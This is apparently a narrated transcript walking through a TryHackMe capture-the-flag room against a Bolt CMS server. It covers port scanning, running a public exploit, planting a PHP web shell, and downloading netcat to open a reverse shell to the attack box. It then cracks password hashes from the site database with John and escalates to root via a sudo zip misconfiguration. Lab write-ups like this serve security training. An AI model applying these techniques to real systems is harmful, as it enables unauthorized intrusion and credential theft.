Let's do this TryHackMe capture the flag room. So we'll be hacking a website running the Bolt CMS software. And to do that, we'll use an exploit and some other tricks. Let's get a start. We'll start a machine. This will be the target machine we'll start. And we'll need the attack box. These are the hacking tools. So it will take a second to start. And the hacking machine will pop up here on the right. And once that is done, we can click this check button because the machines have started. So we need to scan our targets. Like a burglar would check a house with the windows, how many windows does it have, or which windows. A hacker will scan the target, the computer, and check which ports does it have. So it's sort of related. Ports are ways into the computer, and windows are ways into the building. So this is our target address. And like any hacker, they'll use a tool. Typically, they use Nmap. So if we make the font here larger, because it's quite small, we can then scan with a tool called Nmap. This is a command line tool. So if I make this font larger, and we'll scan our targets. So we type Nmap with our target address. So this is the internet address. This is where the website is. This is 4 numbers. That is called the IP address, the internet address. We can copy it. And just like a home address, this is the address of the internet computer that we target. So we paste that in. And then we simply press enter in this command line. So we're in the terminal. I click this little button here that starts the terminal. And we type that command. And we see there are 2 ports open. You see here port, state, and service. So these are open ports, just like you could have open windows in a building. And we have ports 22 and port 80 open. So they want us to type that here with the lowest first. So that's 22 and 80. And they ask us how many ports are open. So obviously there are 2 ports open. We have this port and this port. So next they ask us what the CMS, the system is built on. Now you might not know CMS. CMS is a system to maintain websites. So you can add articles, remove articles, add images, remove images. And basically for any web administrator to update their website. They can add articles, add images, add videos, and so on. That's a CMS, content management system, they call it. Big word for just a tool to update the website. So we cannot see that with Nmap. What we can do, and this is a web tool, we can simply open the URL in a web browser, or we could check the header and see here they have Bolt CMS, so most likely it is Bolt. But if you would want to do it the official way, and we can open Firefox, and then we open this web address. So it tries to open TryHackMe.com. We'll simply type http:// with this internet address. We paste that in. We paste that in here. And then it opens it. And then on top, we see here the Bolt site. And okay, it doesn't let us to go directly, but if we click on it, you'll see boltcms.io. So obviously it is running Bolt, but we could get that also from the top here. But this is of course the official way to find out. So we simply type Bolt. We close this, we don't need it anymore. And click check. Now that Bolt software, it is vulnerable. Sometimes software has vulnerabilities. Programmers make a lot of mistakes. And by using those mistakes with an exploit, we can get into systems. So let's download this exploit. You see a link here, and we can actually clear the screen. You can do right click, copy link address. And to download this app, they say here, download this app, we'll use this command, git clone. Then we paste in the address. And this command will simply download the software. So we got this link by right clicking here, right click, copy link address. Then we paste it in here in this little clipboard and paste it in here with Ctrl+V or right click paste. And we press enter and you'll see it started downloading. You'll see all this gibberish on the screen. If I check with the file explorer, you'll see it downloaded it here. It's simply folder, and in the folder we have a Python program, a README, and something else, some text file. So we can now they ask us what language is used to write the exploit. So if we take a look again, you'll see here py at the end. And here we have this py again. If you open it, you might recognize it. This is Python code. At the top of the file, we see Python. This is a scripting language, widely used scripting language. So we can type Python here and to see correct. Now here they don't really want us to do much, but we can run the exploit. So if we enter the directory in the command line, so we can type cd bold cms, that enters the folder. We can list what's inside the folder with the ls command. And then we have this exploits.py. We can run this with Python. And we replace username with admin. And you see it's still running. It takes a moment or so to finish. So now we got some basic interface here. You see this green bar. We can try to type some commands. And it returns a lot of gibberish, right? So we type something and it tells us, who am I? We are the user, www data, and then a lot of garbage they put after it. So we can type any command, for example, pwd to find the current directory. This is a Linux command. Then again, we have the gibberish and the output is on top. So we have a basic shell into the system, but every time we type a command, it outputs all that gibberish. So we would like to have a better shell. And what we can do is create a reversed shell. This is when the computer we hacked connects to our computer and provides us a better interface that doesn't have all this gibberish when we type commands. Because now we can type any command, right? We can say echo hello world, and the output will be there. Like see, we type echo hello world, and it outputs hello world. But we don't need all this garbage that this goes right after. And typically hackers will create reverse shells. So this is the same as a terminal, but it bypasses the firewall. It's a little trick hackers often use, to reverse shell. And to do that, first we'll create a web shell. So they say here, create a simple PHP shell on the server, and we can do that with this line. So let's say we copy that, and we're gonna paste it in. So we simply copy it from the TryHackMe page, and we're gonna paste it in the terminal. So right click paste, and you'll see it pastes it, and you'll see it basically we echo this data. This is the program. It's a very little program, and it gets any parameter command, the parameter C, and it saves that into c.php. So it's a bit cryptic, this command, but it makes a new file with this content. So this is the content of the file, and it puts that into c.php. So if I press enter, and then I list the files and folders, I'll see all the files and folders. So I did the ls command, and you'll see these are all the files on the computer. And it should have made a new file, this c.php, that we then should be able to access. So let's see. Let's open a new tab, and we copy the link here. And then we open that files/c.php, and maybe with the parameter C, I think the parameter was C. Yes, we get C. So we say C is who am I? And you'll see now we can run commands in the web browser. This is not the reverse shell. This is the web shell or the PHP shell. So with this single command, we create the web shell. And in here, we can do commands in the web. So that's a little better. We don't see any of that gibberish. So for example, we can do the date command and it outputs the current date. Or we can type the ls command and it shows the output. Now, still not ideal. We want a normal shell or reverse shell, but this is a lot better than what we had before. So let's create the reverse shell. To do that, they're going to use a tool called netcat NC. And where this computer, this server doesn't have netcat installed. So we'll need to transfer it from the other computer, from our computer to this server. That's why they start a server on our attack box. And then it downloads it using the wget piece command. We'll download the NC program, the netcat program, from our computer into this server. So into that target. So it's a bit cryptic or a bit tricky, but we can do it. And there's one gotcha with this one. So if I open a new tab here, you'll see later on that they run this netcat command with the flag -e. So if you try that, try netcat, and you'll see it is installed, but there is no -e flag. So if we try netcat -e bin bash, you'll see invalid option. So that's a little gotcha. And to get around this, we download the old version of netcat. This is the traditional version, the netcat that is installed in the attack box. It doesn't have this -e flag. So what we do is we install it with this command, sudo apt-get install nc.traditional. Now to increase the readability, I'll do this. So sudo apt-get install nc.traditional. That will install the traditional version of netcat. And we do that because the version that is included doesn't have this -e flag. So then the whole room wouldn't work. We need that old version of netcat. So you press enter, and now it's complaining that it cannot find them. So let's try that again, and instead of nc, we'll literally spell out netcat. So we'll say sudo apt-get install netcat-traditional, because we need that old version of netcat, otherwise we cannot do this room. So we press enter, and it is now installing that netcat, old version of netcat. So that's netcat-traditional. This is the package name you need to install, and you can do it with this command. And if you install that version of netcat, you can actually complete this part of the room. So it's now installing. And then once it is installed, we should be able to use that -e flag. So it might take a moment for this thing to completely install. And you'll see now it is completed. So we should have nc.traditional. And you'll see we do have it. And we can now try the command nc.traditional -e. And you'll see it doesn't say invalid arguments. It says it requires something more, which is this bin bash. So we now have the old version of netcat installed, the netcat-traditional. So this is the package name you'll need to install. Okay, so let's go on. We can close this tab. And we had a web shell in the computer. So, but we don't have this netcat program in the server. So what we need to do is to link it and then download it from our own computer, from the attack box. We need to transfer it from the attack box, the hacker computer, into the victim's computer. So we're gonna transfer that netcat-traditional using this wget command. But before we transfer it, we need to run these commands. So we need to link it, and then this starts a web server that allows the victim's computer to download it from the attacker. So let's take a look at how that works. First, we run this command. And instead of nc, we'll be running nc.traditional. So change this to .traditional. And make sure you got the spelling of traditional right. Then we press enter, and done. That part is done. Now, we need to start the web server. And actually, let's take a look here in the folder. And we see nc.traditional is now here. We can now start the web server. So we run the second command. And this allows the victim's computer that we have the web shell in, the victim's computer, can now access our attack box if you run this command and download this netcat.traditional. So we copy this command, paste it in, press enter, and you'll see it's now running on port 8000. So now what we need to do is to go to the web server. Now there's a lot of stuff here open, but we simply open a new one. Then we copy this, paste it in, and we're going to change the command here. So instead of ls, what we will say is wget. Wget is a Linux command to download files from the internet. Then we get it from our attack box. So it's http:// whatever address you have here. So in my case, this address, and remember it was on port 8000. So add :8000 at the end. So let's : 8000/ and then the name of the file, which was nc.traditional, and press enter. And you'll see it didn't output anything, but we can double check that it actually downloaded it. If we run the ls command again, we should now see nc.traditional in the list. Then we know that it is downloaded. So with this command, we download this from our attack box. With the wget command, we have our address. Okay, with the nc.traditional, and it downloads from our hacker computer, from our attack box onto this target computer. And we need to do that because we want to create a reverse shell. So what is the next step? Next step, we need to make this netcat traditional executable. We need that this computer can run the program. So for example, if you're in a computer and you have some program, you can normally in the graphical interface, you can set some permissions. So you can say, allow executing this file as a program. Now we need to set that same thing in the command line. So to do that, we type the command here, chmod, and then 755 or +x with nc.traditional. And that sets that permission that the file can be executed, can be run as a program. So then now we should have everything that netcat program on the target computer and executable because we run that chmod command. So next, we're gonna create a reverse shell. So with a reverse shell, the victim's computer connects to the attack box. That's why we need to start a listener. So we open a terminal. Then we type the command nc, and you'll see they write it like this with a lot of minuses. I like to write it as a single command, so minus nlvp, and then a port number, and they always pick, or often pick this port 4444. You can pick another one if you want to, but let's pick that port. Let's stay with the instructions. And then we keep this one open. And let's see if we can get them side by side. So then we have this one, and the victim's computer here is gonna connect to the attack box. So we're gonna do a different command here. So we're gonna run this command. We run this netcat traditional. Notice here they do nc, but we download nc.traditional. So we say /nc.traditional. Then -e bin bash. That means that give us the bash shell, give us the Linux terminal. Then we connect to our attack box. So we need to specify the address of our computer and then the port number. And if you did everything right so far and press enter, you should see a terminal pop up. So in this case, not everything went right. That happens sometimes, and you don't see anything happening. So let's take a look at this command. I'm gonna open this Sublime Text tool here for better readability. So we paste it in. So we have the command here, nc.traditional, -e, bin bash, and then we have the address here, 10.201.7.164 on the correct port. So most likely something is wrong with the command. We could take a look at with the ls command, see if you could find anything there. So we have nc.traditional. Let's see if we got that right. Then we have nc.traditional right there. We could try it without this / in front. See if that makes any difference. And you'll see still not working. So we can check the permissions. We can do ls -al and see if it actually set the permissions. So we have nc.traditional. We find the program here. Now the readability is not the best in this web shell. And you'll see, I don't see any execution permission. We don't see any X here, right, for execute. So we might need to double check that permission command. So let's try that again. chmod +x and then the nc traditional, make it executable. Let's copy it to make sure we don't have any typo. And let's also do it the way that they recommend, 755. So all this does is make the program executable. Okay, now let's run the command again. The previous command where we have this, try to run this netcat with the bin bash with our target address. So that's 10.217.164 in my case. Will be different on your computer on the same port, and press enter. Now we see connection received. So we got an actual reverse shell. If I type the command who am I, you'll see it returns whatever I type here. Or if I type any command, we will get output here. For example, I can do a date command and it tells us the current date. But this is not an ideal shell, right? It doesn't look any normal. So what we need to do now is stabilize the shell. And that sounds more complicated than it is. We simply run this command. So you do copy paste. And you paste that in. Press enter. And now we have a normal shell here. See, we have the normal Linux shell. But this is not our Linux shell. This is the Linux shell in the target computer, right? We are www data here. And on our normal, on our attack box, we are the user root. And you'll see this is the attack box IP. But here we are in the target computer. We are in www-data. And then we are in this folder, varw and so on. So they ask us what username is running on the server. If we do the command who am I, you'll see we are the user www-data. So far so good. We got initial access into the target's computer, into the web server, the target's computer, running the websites. Now, what they want us to do next is to get out of this www data and become another user on the computer. So hackers, they often want to become administrator on the computer or other users in the computer. They don't want to stick with the original user that they have access into, because typically that's very limited, right? The administrator can do anything on the system, and a user like www-data, they can do some things on the system, but not everything. So typically they'll try to become administrator or another user, and they call this privilege escalation or other fancy words, but it just means trying to get to become another user. So let's take a look. Let's clear the screen here. There's too much on it. And we go to var www html/public and list the files and folders. And you'll see there's a lot of different stuff here. So we have we need to go into a folder up. I don't see any folder up here. So let's build one folder up. And we have this folder app. So let's go into this app folder. Then we have a database folder. And in the database folder, they have a database. Now, that is just specific to this computer. There's not always going to be a database if you hack someone's web server. In this case, there is a web server with a database. And probably what they'll want is to use the same password as the database to become a regular user. Now, that is, of course, not always the case. But it could be the case because users do a lot of passwords reuse. So if you read the database, if you find the passwords from that user, you can then reuse that password to become another user on the Linux box, right? Some people use the same password for the Linux computer, the email, the social media, and so on. So basically, that is what they're aiming at. They're hoping that in this database, they're going to have some users which use the same passwords, and then we can use the same in this computer. So to access this, they use the command SQLite3. That's going to open the database, and they type this database name. So the database is simply this file, bolt.db, and this SQLite3 tool is going to open it. So I press enter, and it then opens it. It says here SQLite- simply open the database. Now, they're going to have a bunch of tables, and it doesn't really matter. And databases often store things in different tables. So you'll see we have a bunch of tables, and probably they want us to read this table. Now we can read this command with a SQL command called select. So they select everything from bolt_users semicolon. That simply reads that table. Just like in Excel, you have different tables. Or maybe if you have a physical database, you have different files. So we're going to open the file bolt_users from that database. So this is this bolt.db, and in that closet, in that database, we open the bolt_users with this command. Now this language is quite strict, so if you have some typo there, it's gonna return an error. So you want to be very careful that you have this exactly the same. And you'll see now it returns two users. We have the user admin and the user wild one. So Willie E. Coyote, okay. But their passwords, they are not stored in readable text. They are stored in a thing called a hash. So just like how you can seal an envelope or how you can send things in Telegram format, in the same way you can store passwords in a more secure way, which is called a hash. And that means that we have these hashes here now. We have these two, but we need to crack them. Otherwise, we don't have the regular passwords. So it's just a way to store passwords, but we cannot read them directly. So let's copy this. And I'll copy it into this Sublime text, just to have it. Then we can get out of this program. We press Ctrl-C, and that is something you shouldn't do. Then you go directly back to your attack box. So let's get access again soon. We open the netcat shell. Let's get back into it. And here we run the same command that we had before. So we simply press enter and we'll get a new connection. You'll see we are connected again, but we don't have the stabilized shell. So if I check who am I, we'll see we have this bash shell again. So we are going to type this command again. So in a reverse shell, you want to be careful with the Ctrl-C command because it kicks you out of the server and then you're back in your own computer. Okay, now we are in the shell again. And you see, if I run the whoami command, we have www-data. Okay, good. So we have the hashes now. We found them with these. We pasted them somewhere in Sublime Text. Here we go. And we have those hashes. We can crack those hashes with a tool called John. So John the Ripper is a tool called John. And this will turn those hashes back into a password by cracking them. So we can open a new tab or a new terminal. We can do this on our local computer. We have a tool called John. Notice that this is the attack box. You'll see here root at the address of the attack box. We have a hacking tool called John. If I press enter, see it shows all this output. And if I scroll up, you'll see it says John the Ripper. So this is a tool that can turn hashes into the original passwords. So to use it, we need to create a file. So we can do that with the Sublime tool. Let's make this one maximized. And then we open the Sublime tool. We'll create a new file. And in that file, we simply paste one hash. So let's say this specific hash. We copy it. It is between those little quotes, in those pipes. So we copy the hash. We paste it in. So that is the hash. That is the Securus password. Then we save it. And I'm going to save this as the username. So this was the user Willie, or Willie E. Coyote, or however it's spelled, Willie. And then we type the commands. So we type John with the file we just saved, Willie. And it's going to try to practice using a word list. Now this word list is stored in this password list is stored in the folder word list. And it's called rocku.txt. So this is a file with around 1 million passwords, or a lot of different passwords, and it's gonna try them one by one to convert that hash that we have before, that we found, into an original password. So if we run this command, you'll see it's gonna take a moment, and it's now cracking the passwords. Now this will take a moment or so, and it will then pop out the password if the password matches any of the passwords in rocku.txt. So you'll see it found the password here. So this is the command we run, and it's cracking that hash that we stored in the file Willie, and it then uses that rocku.txt to try the passwords one by one, and then it found the password. So the password is Snickers. And then they ask us about the flag. Now, obviously we don't see any flag. You could try to become the user, what's his name, Willie, using the connection we already have. So in this screen, now we are still the user www-data. If I type who am I, you'll see we are the user www-data. Now, if you take a look here, you'll see there user will EEC. We can change the user by typing su, SU, and then the username. So that's will EEC. Then it's gonna ask us the passwords. That's the passwords that we found before. So that's the password we found by cracking the hash in the database. So the password we use and the password is stored in the database. We then cracked it with this command. And then we found these passwords. So we type same passwords. And if I then do who am I, you'll see that we are the user will EEC. So we can now go to will EEC home folder. So this home/will EEC. If I list the files and folders, we have that flag1.txt. But we also will list the hidden folders with ls-al. And then we have this SSH key pair. So we can now try to connect. So let's try to connect directly with this command. Let's see if we simply paste it in. And then we try who am I. You'll see it looks like it's logged in. And this user, they can run the sudo commands. So if we try sudo -l, we can see what commands we can run as sudo. And you'll see we can run without any passwords the command zip. And we would need to be using it as user John Smith. So let's copy this. So sudo, it runs things as administrator. When you do sudo, it lets you run things as the root user, as administrator, without actually logging out and then logging in as administrator. So it's a little trick to run commands as administrator, as root. That's what this sudo is for. So you do sudo something, it runs it as administrator. For example, if I go on the attack box here, you'll see we are already root, but for example, let's say sudo who am I, then it runs this command who am I as the sudo, as the administrator. So of course we are the user root. Now let's go back here. So we copied, this is the command we found with sudo -l. It can run this command, this zip command, without any passwords. You see here, no passwords. So we copy this, paste it in, and just see we can do that. Now they want us to do another privilege escalation, but now as this Mr. Smith. You'll see here we have this, it can run this John Smith. So we can do sudo -u John Smith, and then we can use this zip command to become administrator. And to do that, we need to use the GTFO bins that they mention here somewhere. Let's see here, GTFO bins. So this link, we open it in a new tab. And with this command, we can abuse Linux commands to become administrator. So the command we're looking for here is the zip command. And so with sudo -l and any Linux system, you can check what commands can you run as sudo. And if it is misconfigured, you can potentially become the root user on the system. So in this case, we're looking for the zip program. So we simply type zip here, then scroll down, and you'll see with this, if this binary, this zip program is allowed to run zip as sudo, it allows us to access the file system, escalate, and blah, blah, blah. So what we're gonna do is run this top one. So we simply copy and paste that top command. Let's remove this. Then we run this, paste it in. So that's the first line we need. Then we copy the second line. And this is going to be slightly different because we are specifically allowed to use the user or the zip file in user bin zip. There might be multiple versions of zip on the system. And also we need to run it as user John Smith. So we're going to copy this and modify it so we can run not zip, but user bin zip. So that's simply being very explicit because there might be multiple versions of zip, and we can run this version of zip as the root user. You'll see that with the sudo -l, we can use user bin zip. So we specify the same path. And we need to run it as John Smith. So we say -u John Smith. And I believe this is the command we'll need. If I right click and paste it, and then do who am I, you'll see we are now user John Smith. So let's take a look. Where are we? We are in the folder home will EEC. Let's go up a folder, and we can enter the folder John Smith. So let's move this thing up. and then we find flag2.txt. Let's see what is inside that text file with the cut command. And it tells us that there's no flag. Maybe I had a typo. Yes, I had flag2.txt. And we find the flag. So let's copy this, paste it in. So we now found this flag. We escalated our privileges and became the user. So we did sudo -l, and then we found that we could use this zip program. Without any password, we could run it, and as the user John Smith. So we specified this command that we found on GTFO bins, but we slightly modified it to become John Smith. Okay, now they want us to become root. So let's take a look what things we can run as root. We do sudo. We'll first do, let's clear the screen a bit. We do whoami. We are user John Smith. We can do sudo -l to see what commands we can run as administrator. And in this case, we can run any commands on the system. So we can simply run the command sudo su and press enter. And we are now root in the Linux system. And they ask us what permissions does John Smith have, which are these permissions. It can run any program without passwords. So you can no password all. So it is not password protected at all. Another misconfiguration. And then they want us to get flag3. Now you'll see in the home folder there is no root. That's because root, the administrator on Linux, is its own folder. As the /root folder. So if you go to the cd/, you'll see there's a folder root. So we enter that folder, and we are then in the folder /root. So it doesn't have /home/root, it's directly in root. And if you list it, there's the flag3, which we can list flag3.txt with the cut command. We can simply read that file. And we then have the final flag of this rune. And there you go. So what we did in this room was we scanned for any open ports. Then we found that there was a web server. With the web server, we found it was running the Bolt CMS. The Bolt CMS was vulnerable, so we run the exploit. Then with the exploit, what we did next was we gained a very basic shell. So we created a web shell. With the web shell, we downloaded the netcat program to then later create a reverse shell. And then we got initial access into the computer using a nice reverse shell. And then what we started to do was not getting initial access, but we started privilege escalation. So we started the next step, which was trying to become the other users in the system. So we initially did that with the sudo command using the GTFO bins. We abused the zip program to become the other user. And then with the other user, we could become root because nothing was password protected. So that's it for this room. I hope you enjoy it.